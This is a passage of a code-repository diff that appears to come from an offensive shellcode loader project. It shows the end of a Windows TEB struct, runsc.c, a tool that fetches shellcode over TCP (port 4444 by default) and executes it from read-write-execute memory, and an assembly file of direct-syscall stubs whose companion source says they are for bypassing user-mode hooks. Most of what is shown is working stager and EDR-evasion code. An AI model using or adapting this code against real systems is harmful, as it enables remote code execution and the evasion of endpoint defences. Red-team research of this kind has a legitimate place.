231 ULONG CountOfOwnedCriticalSections;
232 PVOID CsrClientThread;
233 PVOID Win32ThreadInfo;
234 ULONG User32Reserved[26];
235 ULONG UserReserved[5];
236 PVOID WOW32Reserved;
237 LCID CurrentLocale;
238 ULONG FpSoftwareStatusRegister;
239 PVOID SystemReserved1[54];
240 NTSTATUS ExceptionCode;
241 PVOID ActivationContextStackPointer;
242 #ifdef _M_X64
243 UCHAR SpareBytes[24];
244 #else
245 UCHAR SpareBytes[36];
246 #endif
247 ULONG TxFsContext;
248
249 GDI_TEB_BATCH GdiTebBatch;
250 CLIENT_ID RealClientId;
251 HANDLE GdiCachedProcessHandle;
252 ULONG GdiClientPID;
253 ULONG GdiClientTID;
254 PVOID GdiThreadLocalInfo;
255 ULONG_PTR Win32ClientInfo[62];
256 PVOID glDispatchTable[233];
257 ULONG_PTR glReserved1[29];
258 PVOID glReserved2;
259 PVOID glSectionInfo;
260 PVOID glSection;
261 PVOID glTable;
262 PVOID glCurrentRC;
263 PVOID glContext;
264
265 NTSTATUS LastStatusValue;
266 UNICODE_STRING StaticUnicodeString;
267 WCHAR StaticUnicodeBuffer[261];
268
269 PVOID DeallocationStack;
270 PVOID TlsSlots[64];
271 LIST_ENTRY TlsLinks;
272
273 PVOID Vdm;
274 PVOID ReservedForNtRpc;
275 PVOID DbgSsReserved[2];
276
277 ULONG HardErrorMode;
278 #ifdef _M_X64
279 PVOID Instrumentation[11];
280 #else
281 PVOID Instrumentation[9];
282 #endif
283 GUID ActivityId;
284
285 PVOID SubProcessTag;
286 PVOID EtwLocalData;
287 PVOID EtwTraceData;
288 PVOID WinSockData;
289 ULONG GdiBatchCount;
290
291 union
292 {
293 PROCESSOR_NUMBER CurrentIdealProcessor;
294 ULONG IdealProcessorValue;
295 struct
296 {
297 UCHAR ReservedPad0;
298 UCHAR ReservedPad1;
299 UCHAR ReservedPad2;
300 UCHAR IdealProcessor;
301 };
302 };
303
304 ULONG GuaranteedStackBytes;
305 PVOID ReservedForPerf;
306 PVOID ReservedForOle;
307 ULONG WaitingOnLoaderLock;
308 PVOID SavedPriorityState;
309 ULONG_PTR SoftPatchPtr1;
310 PVOID ThreadPoolData;
311 PVOID *TlsExpansionSlots;
312 #ifdef _M_X64
313 PVOID DeallocationBStore;
314 PVOID BStoreLimit;
315 #endif
316 ULONG MuiGeneration;
317 ULONG IsImpersonating;
318 PVOID NlsCache;
319 PVOID pShimData;
320 ULONG HeapVirtualAffinity;
321 HANDLE CurrentTransactionHandle;
322 PTEB_ACTIVE_FRAME ActiveFrame;
323 PVOID FlsData;
324
325 PVOID PreferredLanguages;
326 PVOID UserPrefLanguages;
327 PVOID MergedPrefLanguages;
328 ULONG MuiImpersonation;
329
330 union
331 {
332 USHORT CrossTebFlags;
333 USHORT SpareCrossTebBits : 16;
334 };
335 union
336 {
337 USHORT SameTebFlags;
338 struct
339 {
340 USHORT SafeThunkCall : 1;
341 USHORT InDebugPrint : 1;
342 USHORT HasFiberData : 1;
343 USHORT SkipThreadAttach : 1;
344 USHORT WerInShipAssertCode : 1;
345 USHORT RanProcessInit : 1;
346 USHORT ClonedThread : 1;
347 USHORT SuppressDebugMsg : 1;
348 USHORT DisableUserStackWalk : 1;
349 USHORT RtlExceptionAttached : 1;
350 USHORT InitialThread : 1;
351 USHORT SessionAware : 1;
352 USHORT SpareSameTebBits : 4;
353 };
354 };
355
356 PVOID TxnScopeEnterCallback;
357 PVOID TxnScopeExitCallback;
358 PVOID TxnScopeContext;
359 ULONG LockCount;
360 ULONG SpareUlong0;
361 PVOID ResourceRetValue;
362 PVOID ReservedForWdf;
363 } TEB, *PTEB;
364
365 #endif
+737
-0
loader/runsc.c less more
0
1 /**
2 Copyright © 2016-2019 Odzhan. All Rights Reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are
6 met:
7
8 1. Redistributions of source code must retain the above copyright
9 notice, this list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright
12 notice, this list of conditions and the following disclaimer in the
13 documentation and/or other materials provided with the distribution.
14
15 3. The name of the author may not be used to endorse or promote products
16 derived from this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19 IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
23 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25 HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26 STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27 ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28 POSSIBILITY OF SUCH DAMAGE. */
29
30 #if defined(_WIN32) || defined(_WIN64)
31 #ifndef _WIN32_WINNT
32 #define _WIN32_WINNT 0x0502
33 #endif
34 #define WIN
35 #ifndef _WINSOCKAPI_
36 #define _WINSOCKAPI_
37 #endif
38 #include <windows.h>
39 #include <shlwapi.h>
40 #include <winsock2.h>
41 #include <ws2tcpip.h>
42 #define close closesocket
43 #define SHUT_RDWR SD_BOTH
44 #pragma comment(lib, "ws2_32.lib")
45 #pragma comment(lib, "shlwapi.lib")
46 #else
47 #include <unistd.h>
48 #include <sys/socket.h>
49 #include <sys/types.h>
50 #include <sys/mman.h>
51 #include <arpa/inet.h>
52 #include <netdb.h>
53 #include <netinet/in.h>
54 #include <sys/ioctl.h>
55 #include <net/if.h>
56 #include <signal.h>
57 #include <fcntl.h>
58 #endif
59
60 #include <stdio.h>
61 #include <stdint.h>
62 #include <string.h>
63 #include <stdlib.h>
64 #include <time.h>
65 #include <sys/stat.h>
66
67 #define RSC_CLIENT 0
68 #define RSC_SERVER 1
69 #define RSC_EXEC 2
70
71 #define RSC_SEND 0
72 #define RSC_RECV 1
73
74 #define DEFAULT_PORT "4444"
75
76 // structure for parameters
77 typedef struct _args_t {
78 int s, r;
79 char *port, *address, *file;
80 #ifdef WIN
81 char *modules;
82 #endif
83 int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
84 struct sockaddr *ai_addr;
85 struct sockaddr_in v4;
86 struct sockaddr_in6 v6;
87 char ip[INET6_ADDRSTRLEN];
88 uint32_t code_len;
89 void *code;
90 } args_t;
91
92 #ifdef WIN
93 /**F*****************************************************************/
94 void xstrerror (char *fmt, ...)
95 /**
96 * PURPOSE : Display windows error
97 *
98 * RETURN : Nothing
99 *
100 * NOTES : None
101 *
102 *F*/
103 {
104 char *error=NULL;
105 va_list arglist;
106 char buffer[2048];
107 DWORD dwError=GetLastError();
108
109 va_start (arglist, fmt);
110 wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
111 va_end (arglist);
112
113 if (FormatMessage (
114 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
115 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
116 (LPSTR)&error, 0, NULL))
117 {
118 printf ("[ %s : %s\n", buffer, error);
119 LocalFree (error);
120 } else {
121 printf ("[ %s : %i\n", buffer, dwError);
122 }
123 }
124 #else
125 #define xstrerror printf
126 #endif
127
128 char *addr2ip(args_t *p)
129 {
130 void *src;
131 #ifdef WIN
132 DWORD ip_size=INET6_ADDRSTRLEN;
133 WSAAddressToString (p->ai_addr, p->ai_addrlen,
134 NULL, (char*)p->ip, &ip_size);
135 #else
136 if (p->ai_family==AF_INET) {
137 src=(void*)&p->v4.sin_addr;
138 } else {
139 src=(void*)&p->v6.sin6_addr;
140 }
141 inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
142 #endif
143 return p->ip;
144 }
145
146 int init_network (args_t *p)
147 /**
148 * PURPOSE : initialize winsock for windows, resolve network address
149 *
150 * RETURN : 1 for okay else 0
151 *
152 * NOTES : None
153 *
154 *F*/
155 {
156 struct addrinfo *list=NULL, *e=NULL;
157 struct addrinfo hints;
158 int r, t;
159
160 // initialize winsock if windows
161 #ifdef WIN
162 WSADATA wsa;
163 WSAStartup (MAKEWORD (2, 0), &wsa);
164 #endif
165
166 r=0;
167 // set network address length to zero
168 p->ai_addrlen = 0;
169
170 // if no address supplied
171 if (p->address==NULL)
172 {
173 // is it ipv4?
174 if (p->ai_family==AF_INET) {
175 p->v4.sin_family = AF_INET;
176 p->v4.sin_port = htons((u_short)p->port_nbr);
177 p->v4.sin_addr.s_addr = INADDR_ANY;
178 p->ai_addr = (struct sockaddr*)&p->v4;
179 p->ai_addrlen = sizeof (struct sockaddr_in);
180 } else {
181 // else it's ipv6
182 p->v6.sin6_family = AF_INET6;
183 p->v6.sin6_port = htons((u_short)p->port_nbr);
184 p->v6.sin6_addr = in6addr_any;
185 p->ai_addr = (struct sockaddr*)&p->v6;
186 p->ai_addrlen = sizeof (struct sockaddr_in6);
187 }
188 } else {
189 memset (&hints, 0, sizeof (hints));
190
191 hints.ai_flags = AI_PASSIVE;
192 hints.ai_family = p->ai_family;
193 hints.ai_socktype = SOCK_STREAM;
194 hints.ai_protocol = IPPROTO_TCP;
195
196 // get all network addresses
197 t=getaddrinfo (p->address, p->port, &hints, &list);
198 if (t == 0)
199 {
200 for (e=list; e!=NULL; e=e->ai_next)
201 {
202 // copy to ipv4 structure
203 if (p->ai_family==AF_INET) {
204 memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
205 p->ai_addr = (struct sockaddr*)&p->v4;
206 } else {
207 // ipv6 structure
208 memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
209 p->ai_addr = (struct sockaddr*)&p->v6;
210 }
211 // assign size of structure
212 p->ai_addrlen = e->ai_addrlen;
213 break;
214 }
215 freeaddrinfo (list);
216 } else {
217 xstrerror ("getaddrinfo");
218 }
219 }
220 return p->ai_addrlen;
221 }
222
223 void debug(void *bin)
224 {
225 //
226 //__builtin_trap();
227 //raise(SIGTRAP);
228 }
229
230 // allocate read/write and executable memory
231 // copy data from p->code and execute
232 void xcode(args_t *p)
233 {
234 void *bin;
235 int i;
236 int fd[2048];
237
238 if (p->code_len == 0) {
239 printf("[ no code to execute.\n");
240 return;
241 }
242 printf ("[ executing code...");
243
244 #ifdef WIN
245 bin=VirtualAlloc (0, p->code_len,
246 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
247 #else
248 bin=mmap (0, p->code_len,
249 PROT_EXEC | PROT_WRITE | PROT_READ,
250 MAP_ANON | MAP_PRIVATE, -1, 0);
251 #endif
252 if (bin!=NULL)
253 {
254 memcpy (bin, p->code, p->code_len);
255 // create file/socket descriptors to simulate real system
256 // created interesting results on openbsd with limits
257 // to how many files could be open at once..
258 //
259 if (p->sim) {
260 #ifndef WIN
261 for (i=0; i<p->sim && p->sim<2048; i++) {
262 fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
263 }
264 #else
265 // todo
266 for (i=0; i<p->sim && p->sim<2048; i++) {
267 }
268 #endif
269 }
270
271 // debug the code?
272 if (p->dbg) {
273 #if defined(_WIN32) || defined(_WIN64)
274 DebugBreak();
275 #else
276 raise(SIGTRAP);
277 #endif
278 }
279
280 // execute
281 ((void(*)())bin)();
282
283 printf("OK!\n");
284
285 if (p->sim) {
286 #ifndef WIN
287 // close all descriptors
288 for (i=0; i<p->sim && p->sim<2048; i++) {
289 close(fd[i]);
290 }
291 #else
292 // todo
293 #endif
294 }
295 #ifdef WIN
296 VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
297 #else
298 munmap (bin, p->code_len);
299 #endif
300 }
301 }
302
303 void send_data(args_t *p, int s) {
304 FILE *fd;
305 int outlen, len, opt;
306 uint32_t sum;
307 uint8_t buf[BUFSIZ];
308
309 // open file for read in binary mode
310 printf ("[ opening %s for read\n", p->file);
311 fd = fopen(p->file, "rb");
312
313 if (fd != NULL)
314 {
315 // send contents of file
316 printf ("[ sending data\n");
317 for (;;) {
318 // read block
319 outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
320 // zero or less indicates EOF
321 if (outlen <= 0) break;
322 // send contents
323 for (sum=0; sum<outlen; sum += len) {
324 len=send (s, &buf[sum], outlen - sum, 0);
325 if (len <= 0) break;
326 }
327 p->code_len += sum;
328 if (outlen != sum) break;
329 }
330 printf ("[ sent %i bytes\n", p->code_len);
331 fclose(fd);
332 }
333 }
334
335 void recv_data(args_t *p, int s) {
336 int opt, r;
337 fd_set fds;
338 struct timeval tv;
339 void *pv;
340
341 p->code_len = 0;
342 p->code = malloc(BUFSIZ);
343
344 // set to non-blocking mode
345 #ifdef WIN
346 opt=1;
347 ioctlsocket (s, FIONBIO, (u_long*)&opt);
348 #else
349 opt=fcntl(s, F_GETFL, 0);
350 fcntl(s, F_SETFL, opt | O_NONBLOCK);
351 #endif
352 // keep reading until remote disconnects or we run out of memory
353 printf ("[ receiving data\n");
354
355 for (;;) {
356 FD_ZERO(&fds);
357 FD_SET(s, &fds);
358
359 tv.tv_sec = 5;
360 tv.tv_usec = 0;
361 r = select(FD_SETSIZE, &fds, 0, 0, &tv);
362
363 if (r <= 0) {
364 printf ("[ waiting for data timed out or failed\n");
365 break;
366 }
367 // receive a block
368 r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
369 if (r <= 0) break;
370 p->code_len += r;
371 // resize buffer
372 pv = realloc(p->code, p->code_len + BUFSIZ);
373 // on error, free pointer
374 if(pv == NULL) {
375 p->code_len = 0;
376 free(p->code);
377 p->code = NULL;
378 printf("[ error: out of memory.\n");
379 break;
380 }
381 p->code = pv;
382 }
383 if(p->code_len != 0) {
384 printf ("[ received %i bytes\n", p->code_len);
385 }
386 }
387
388 //
389 int ssr (args_t *p)
390 /**
391 * PURPOSE : send a shellcode or receive one from remote system and execute it
392 *
393 * RETURN : 0 or length of shellcode sent/received
394 *
395 * NOTES : None
396 *
397 *F*/
398 {
399 int s, opt, r, t;
400 fd_set fds;
401 struct timeval tv;
402
403 p->code_len=0;
404
405 // create socket
406 printf ("[ creating socket\n");
407 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
408 if (s < 0) return 0;
409
410 // ensure we can reuse socket
411 t=1;
412 setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
413
414 // bind to port
415 printf ("[ binding to port %s\n", p->port);
416 r = bind(s, p->ai_addr, p->ai_addrlen);
417 if (r == 0) {
418 // listen
419 r = listen (s, 1);
420 if (r == 0) {
421 printf ("[ waiting for connections on %s\n", addr2ip(p));
422 if (r == 0) {
423 t = accept(s, p->ai_addr, &p->ai_addrlen);
424 printf ("[ accepting connection from %s\n", addr2ip(p));
425 if (t > 0) {
426 if (p->tx_mode == RSC_SEND) {
427 send_data(p, t);
428 } else {
429 recv_data(p, t);
430 xcode(p);
431 }
432 }
433 }
434 // close socket to peer
435 shutdown(t, SHUT_RDWR);
436 close(t);
437 } else {
438 perror("listen");
439 }
440 } else {
441 perror("bind");
442 }
443 // close listening socket
444 shutdown(s, SHUT_RDWR);
445 close(s);
446
447 return p->code_len;
448 }
449
450 /**F*****************************************************************/
451 int csr (args_t *p)
452 /**
453 * PURPOSE : opens connection to remote system and sends shellcode
454 *
455 * RETURN : 0 or 1
456 *
457 * NOTES : None
458 *
459 *F*/
460 {
461 int s, r, opt;
462 fd_set fds;
463 struct timeval tv;
464
465 printf ("[ creating socket\n");
466 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
467 if (s < 0) return 0;
468
469 // try connect to remote
470 printf ("[ connecting to %s\n", addr2ip(p));
471 r = connect(s, p->ai_addr, p->ai_addrlen);
472
473 if (r == 0) {
474 if (p->tx_mode==RSC_SEND) {
475 send_data(p, s);
476 } else {
477 recv_data(p, s);
478 xcode(p);
479 }
480 } else {
481 xstrerror("connect");
482 }
483 printf ("[ closing connection\n");
484 shutdown(s, SHUT_RDWR);
485 close(s);
486 return 1;
487 }
488
489 /**F*****************************************************************/
490 void xfile(args_t *p)
491 /**
492 * PURPOSE : read contents of shellcode and attempt to execute it locally
493 *
494 * RETURN : Nothing
495 *
496 * NOTES : None
497 *
498 *F*/
499 {
500 FILE *fd;
501 int len;
502 void *pv;
503
504 p->code_len = 0;
505 p->code = NULL;
506
507 printf ("[ reading code from %s\n", p->file);
508 fd = fopen(p->file, "rb");
509
510 if (fd == NULL) {
511 xstrerror("fopen(\"%s\")", p->file);
512 return;
513 }
514 // read contents of file
515 for (;;) {
516 // first loop? allocate block
517 if(p->code == NULL) {
518 p->code = malloc(BUFSIZ);
519 }
520 // read a block of data
521 len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
522 if (len <= 0) break;
523 p->code_len += len;
524 // resize buffer for next read
525 pv = realloc(p->code, p->code_len + BUFSIZ);
526
527 if(pv == NULL) {
528 p->code_len = 0;
529 free(p->code);
530 p->code = NULL;
531 printf("[ error: out of memory!.\n");
532 break;
533 }
534 p->code = pv;
535 }
536 fclose(fd);
537
538 if(p->code_len != 0) {
539 xcode(p);
540 }
541 }
542
543 #ifdef WIN
544 void load_modules(char *names) {
545 HMODULE mod;
546 char *p = strtok(names, ";,");
547
548 while (p != NULL) {
549 printf ("[ loading %s...", p);
550 mod = LoadLibrary(p);
551
552 printf ("%s\n", mod==NULL ? "FAILED" : "OK");
553
554 p = strtok(NULL, ";,");
555 }
556 }
557 #endif
558
559 /**F*****************************************************************/
560 void usage (void) {
561 printf ("\n usage: runsc <address> [options]\n");
562 printf ("\n -4 Use IP version 4 (default)");
563 printf ("\n -6 Use IP version 6");
564 printf ("\n -l Listen mode (required when listening on specific interface)");
565 #ifdef WIN
566 printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
567 #endif
568 printf ("\n -f <file> Read PIC from <file>");
569 printf ("\n -s <count> Simulate real process by creating file descriptors");
570 printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
571 printf ("\n -x Execute PIC (requires -f)");
572 printf ("\n\n Press any key to continue . . .");
573 getchar ();
574
575 exit (0);
576 }
577
578 /**F*****************************************************************/
579 char* getparam (int argc, char *argv[], int *i) {
580 int n=*i;
581 if (argv[n][2] != 0) {
582 return &argv[n][2];
583 }
584 if ((n+1) < argc) {
585 *i=n+1;
586 return argv[n+1];
587 }
588 printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
589 exit (0);
590 }
591
592 void parse_args (args_t *p, int argc, char *argv[]) {
593 int i;
594 char opt;
595
596 // for each argument
597 for (i=1; i<argc; i++)
598 {
599 // is this option?
600 if (argv[i][0]=='-' || argv[i][1]=='/')
601 {
602 // get option value
603 opt=argv[i][1];
604 switch (opt)
605 {
606 case '4':
607 p->ai_family=AF_INET;
608 break;
609 case '6': // use ipv6 (default is ipv4)
610 p->ai_family=AF_INET6;
611 break;
612 case 'x': // execute PIC, requires -f
613 p->mode=RSC_EXEC;
614 break;
615 case 'd': // debug the code
616 p->dbg=1;
617 break;
618 case 'f': // file
619 p->file=getparam(argc, argv, &i);
620 break;
621 case 'l': // listen for incoming connections
622 p->mode=RSC_SERVER;
623 break;
624 #ifdef WIN
625 case 'm': // windows only, loads modules required by shellcode
626 p->modules = getparam(argc, argv, &i);
627 break;
628 #endif
629 case 's': // create file descriptors before execution
630 p->sim=atoi(getparam(argc, argv, &i));
631 break;
632 case 'p': // port number
633 p->port=getparam(argc, argv, &i);
634 p->port_nbr=atoi(p->port);
635 break;
636 case '?': // display usage
637 case 'h':
638 usage ();
639 break;
640 default:
641 printf ("[ unknown option %c\n", opt);
642 usage();
643 break;
644 }
645 } else {
646 // assume it's hostname or ip
647 p->address=argv[i];
648 p->mode=RSC_CLIENT;
649 }
650 }
651 }
652
653 int main (int argc, char *argv[]) {
654 args_t args;
655 struct stat st;
656
657 #ifdef WIN
658 //
659 PVOID OldValue=NULL;
660 WSADATA wsa;
661
662 //Wow64DisableWow64FsRedirection (&OldValue);
663 LoadLibrary("ws2_32");
664 LoadLibrary("advapi32");
665
666 WSAStartup(MAKEWORD(2,0), &wsa);
667 #endif
668
669 setbuf(stdout, NULL);
670 setbuf(stderr, NULL);
671
672 memset (&args, 0, sizeof(args));
673
674 // set default parameters
675 args.address = NULL;
676 args.file = NULL;
677 args.ai_family = AF_INET;
678 args.port = DEFAULT_PORT;
679 args.port_nbr = atoi(args.port);
680 args.mode = -1;
681 args.tx_mode = -1;
682 args.sim = 0;
683 args.dbg = 0;
684
685 printf ("\n[ run shellcode v0.2\n");
686
687 parse_args(&args, argc, argv);
688
689 // check if we have file parameter and it accessible
690 if (args.file!=NULL) {
691 if (stat (args.file, &st)) {
692 printf ("[ unable to access %s\n", args.file);
693 return 0;
694 }
695 }
696
697 #ifdef WIN
698 if (args.modules != NULL) {
699 load_modules(args.modules);
700 }
701 #endif
702 // if mode is executing
703 if (args.mode == RSC_EXEC) {
704 if (args.file != NULL) {
705 xfile(&args);
706 return 0;
707 } else {
708 printf ("\n[ you've used -x without supplying file with -f");
709 return 0;
710 }
711 }
712 if (init_network(&args)) {
713 // if no file specified, we receive and execute data
714 args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
715
716 // if mode is -1, we listen for incoming connections
717 if (args.mode == -1) {
718 args.mode=RSC_SERVER;
719 }
720
721 // if no file specified, set to receive one
722 if (args.tx_mode == -1) {
723 args.tx_mode = RSC_RECV;
724 }
725
726 if (args.mode == RSC_SERVER) {
727 ssr (&args);
728 } else {
729 csr (&args);
730 }
731 }
732 if(args.code_len != 0) {
733 free(args.code);
734 }
735 return 0;
736 }
+271
-0
loader/syscalls-asm.asm less more
0 .code
1
2 EXTERN SW2_GetSyscallNumber: PROC
3
4 NtCreateSection PROC
5 push rcx
6 push rdx
7 push r8
8 push r9
9 mov ecx, 032956E27h
10 mov rdx, qword ptr [rsp + 060h]
11 sub rsp, 028h
12 call SW2_GetSyscallNumber
13 add rsp, 028h
14 pop r9
15 pop r8
16 pop rdx
17 pop rcx
18 mov r10, rcx
19 syscall
20 ret
21 NtCreateSection ENDP
22
23 NtMapViewOfSection PROC
24 push rcx
25 push rdx
26 push r8
27 push r9
28 mov ecx, 0035E220Dh
29 mov rdx, qword ptr [rsp + 078h]
30 sub rsp, 028h
31 call SW2_GetSyscallNumber
32 add rsp, 028h
33 pop r9
34 pop r8
35 pop rdx
36 pop rcx
37 mov r10, rcx
38 syscall
39 ret
40 NtMapViewOfSection ENDP
41
42 NtUnmapViewOfSection PROC
43 push rcx
44 push rdx
45 push r8
46 push r9
47 mov ecx, 09ACEB842h
48 mov rdx, r8
49 sub rsp, 028h
50 call SW2_GetSyscallNumber
51 add rsp, 028h
52 pop r9
53 pop r8
54 pop rdx
55 pop rcx
56 mov r10, rcx
57 syscall
58 ret
59 NtUnmapViewOfSection ENDP
60
61 NtContinue PROC
62 push rcx
63 push rdx
64 push r8
65 push r9
66 mov ecx, 0F2989153h
67 mov rdx, r8
68 sub rsp, 028h
69 call SW2_GetSyscallNumber
70 add rsp, 028h
71 pop r9
72 pop r8
73 pop rdx
74 pop rcx
75 mov r10, rcx
76 syscall
77 ret
78 NtContinue ENDP
79
80 NtClose PROC
81 push rcx
82 push rdx
83 push r8
84 push r9
85 mov ecx, 0349DD6D1h
86 mov rdx, rdx
87 sub rsp, 028h
88 call SW2_GetSyscallNumber
89 add rsp, 028h
90 pop r9
91 pop r8
92 pop rdx
93 pop rcx
94 mov r10, rcx
95 syscall
96 ret
97 NtClose ENDP
98
99 NtWaitForSingleObject PROC
100 push rcx
101 push rdx
102 push r8
103 push r9
104 mov ecx, 0E3BDE123h
105 mov rdx, r9
106 sub rsp, 028h
107 call SW2_GetSyscallNumber
108 add rsp, 028h
109 pop r9
110 pop r8
111 pop rdx
112 pop rcx
113 mov r10, rcx
114 syscall
115 ret
116 NtWaitForSingleObject ENDP
117
118 NtProtectVirtualMemory PROC
119 push rcx
120 push rdx
121 push r8
122 push r9
123 mov ecx, 00B911517h
124 mov rdx, qword ptr [rsp + 050h]
125 sub rsp, 028h
126 call SW2_GetSyscallNumber
127 add rsp, 028h
128 pop r9
129 pop r8
130 pop rdx
131 pop rcx
132 mov r10, rcx
133 syscall
134 ret
135 NtProtectVirtualMemory ENDP
136
137 NtGetContextThread PROC
138 push rcx
139 push rdx
140 push r8
141 push r9
142 mov ecx, 01CB74215h
143 mov rdx, r8
144 sub rsp, 028h
145 call SW2_GetSyscallNumber
146 add rsp, 028h
147 pop r9
148 pop r8
149 pop rdx
150 pop rcx
151 mov r10, rcx
152 syscall
153 ret
154 NtGetContextThread ENDP
155
156 NtAllocateVirtualMemory PROC
157 push rcx
158 push rdx
159 push r8
160 push r9
161 mov ecx, 031A5474Bh
162 mov rdx, qword ptr [rsp + 058h]
163 sub rsp, 028h
164 call SW2_GetSyscallNumber
165 add rsp, 028h
166 pop r9
167 pop r8
168 pop rdx
169 pop rcx
170 mov r10, rcx
171 syscall
172 ret
173 NtAllocateVirtualMemory ENDP
174
175 NtFreeVirtualMemory PROC
176 push rcx
177 push rdx
178 push r8
179 push r9
180 mov ecx, 087907FEFh
181 mov rdx, qword ptr [rsp + 048h]
182 sub rsp, 028h
183 call SW2_GetSyscallNumber
184 add rsp, 028h
185 pop r9
186 pop r8
187 pop rdx
188 pop rcx
189 mov r10, rcx
190 syscall
191 ret
192 NtFreeVirtualMemory ENDP
193
194 NtCreateFile PROC
195 push rcx
196 push rdx
197 push r8
198 push r9
199 mov ecx, 0249DFE2Ah
200 mov rdx, qword ptr [rsp + 080h]
201 sub rsp, 028h
202 call SW2_GetSyscallNumber
203 add rsp, 028h
204 pop r9
205 pop r8
206 pop rdx
207 pop rcx
208 mov r10, rcx
209 syscall
210 ret
211 NtCreateFile ENDP
212
213 NtQueryVirtualMemory PROC
214 push rcx
215 push rdx
216 push r8
217 push r9
218 mov ecx, 055CF2B39h
219 mov rdx, qword ptr [rsp + 058h]
220 sub rsp, 028h
221 call SW2_GetSyscallNumber
222 add rsp, 028h
223 pop r9
224 pop r8
225 pop rdx
226 pop rcx
227 mov r10, rcx
228 syscall
229 ret
230 NtQueryVirtualMemory ENDP
231
232 NtCreateThreadEx PROC
233 push rcx
234 push rdx
235 push r8
236 push r9
237 mov ecx, 034297693h
238 mov rdx, qword ptr [rsp + 080h]
239 sub rsp, 028h
240 call SW2_GetSyscallNumber
241 add rsp, 028h
242 pop r9
243 pop r8
244 pop rdx
245 pop rcx
246 mov r10, rcx
247 syscall
248 ret
249 NtCreateThreadEx ENDP
250
251 NtFlushInstructionCache PROC
252 push rcx
253 push rdx
254 push r8
255 push r9
256 mov ecx, 0FFACC9F7h
257 mov rdx, r9
258 sub rsp, 028h
259 call SW2_GetSyscallNumber
260 add rsp, 028h
261 pop r9
262 pop r8
263 pop rdx
264 pop rcx
265 mov r10, rcx
266 syscall
267 ret
268 NtFlushInstructionCache ENDP
269
270 end
+978
-0
loader/syscalls.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "syscalls.h"
32
33 // Code below is adapted from @modexpblog. Read linked article for more details.
34 // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
35
36 DWORD SW2_HashSyscall(PCSTR FunctionName)
37 {
38 DWORD i = 0;
39 DWORD Hash = SW2_SEED;
40
41 while (FunctionName[i])
42 {
43 WORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);
44 Hash ^= PartialName + SW2_ROR8(Hash);
45 }
46
47 return Hash;
48 }
49
50 BOOL SW2_PopulateSyscallList(PSYSCALL_LIST SyscallList)
51 {
52 // Return early if the list is already populated.
53 if (SyscallList->Count) return TRUE;
54
